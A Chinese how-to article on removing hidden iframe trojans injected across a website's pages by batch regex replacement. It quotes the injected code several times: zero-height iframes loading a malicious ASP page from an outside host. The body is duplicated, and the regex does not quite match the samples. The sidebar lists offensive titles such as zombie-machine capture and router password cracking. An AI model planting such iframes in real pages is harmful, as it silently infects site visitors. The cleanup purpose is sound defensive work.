挂马清理:批量使用替换工具删除相关木马
发布时间:2012-12-01 00:30:35作者:知识屋
网站被批量挂马是经常遇到的事情,一般用批量替换工具很方便就可以批量删除相关代码,但是如果一个网站里面每个页面都被放置了木马,而且代码还都不一样。这种情况如何处理?
下面我们一起来学习一下批量使用替换工具删除相关木马:
因为没有一个页面挂的马是相同的,所以根本删不掉。前几天我的一个朋友就遇到了这个问题。他诉苦道服务器上一个网站被批量挂了木马,仔细一看居然每个页面挂的木马都不一样。
我检查了一下是类似这样的情况:
页面一的木马是:
<ifraME src=http://www.hxhack.com /isme.asp widTH=50 height=0 name=5148 naMe=2 boRdeR=0></ifRame>
页面二的木马是:
<ifraME src=http://www.hxhack.com /isme.asp widTH=50 height=0 name=2133 naMe=2 boRdeR=0></ifRame>
页面三的木马是:
<ifraME src=http://www.hxhack.com /isme.asp widTH=50 height=0 name=4583 naMe=2 boRdeR=0></ifRame>
……
仔细看,虽然每个页面上挂的木马不同,但是还是有一定规律的。
这时候,我就在郁闷了,要是能有一个支持正则的批量替换工具就好了。还好补天的areone帮忙,给我介绍了一个小工具,恰恰可以满足这个要求。
打开AFR工具,选择批量替换:
搜索内容部分填写:
<ifraME src=http://xxxxx/u.asp widTH=50 height=0 name=d{4} naMe=2 boRdeR=0></ifRame>
替换为空 即可。
注意上面语句中红色部分,就是正则表达式了。通过这种方法,就可以批量对木马进行删除了。
很快,清除了4百多个页面上的木马。大功告成。
正则表达式在平时技术方面的应用中用的很多,后面我也会给大家找一些这方面的教材。
下面我们一起来学习一下批量使用替换工具删除相关木马:
因为没有一个页面挂的马是相同的,所以根本删不掉。前几天我的一个朋友就遇到了这个问题。他诉苦道服务器上一个网站被批量挂了木马,仔细一看居然每个页面挂的木马都不一样。
我检查了一下是类似这样的情况:
页面一的木马是:
<ifraME src=http://www.hxhack.com /isme.asp widTH=50 height=0 name=5148 naMe=2 boRdeR=0></ifRame>
页面二的木马是:
<ifraME src=http://www.hxhack.com /isme.asp widTH=50 height=0 name=2133 naMe=2 boRdeR=0></ifRame>
页面三的木马是:
<ifraME src=http://www.hxhack.com /isme.asp widTH=50 height=0 name=4583 naMe=2 boRdeR=0></ifRame>
……
仔细看,虽然每个页面上挂的木马不同,但是还是有一定规律的。
这时候,我就在郁闷了,要是能有一个支持正则的批量替换工具就好了。还好补天的areone帮忙,给我介绍了一个小工具,恰恰可以满足这个要求。
打开AFR工具,选择批量替换:
搜索内容部分填写:
<ifraME src=http://xxxxx/u.asp widTH=50 height=0 name=d{4} naMe=2 boRdeR=0></ifRame>
替换为空 即可。
注意上面语句中红色部分,就是正则表达式了。通过这种方法,就可以批量对木马进行删除了。
很快,清除了4百多个页面上的木马。大功告成。
正则表达式在平时技术方面的应用中用的很多,后面我也会给大家找一些这方面的教材。
(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
相关知识
软件推荐
更多 >
-
1菜鸟简单抓肉鸡(如何抓肉鸡)
2011-06-17
-
2
电脑开机时出现lass.exe进程是病毒吗?
-
3
自拍须谨慎!教你如何通过照片定位查看拍摄地点
-
4
电脑病毒最基础知识
-
5
黑客学员必须了解的C语言技术
-
6
精典详细内网渗透专题文章
-
7
教你破解Tp-Link的无线路由密码
-
8
解决SecureCRT中文显示乱码
-
9
QQ电脑管家和360哪个好?横评实测对比
-
10
攻防实战:无线网络路由入侵过程
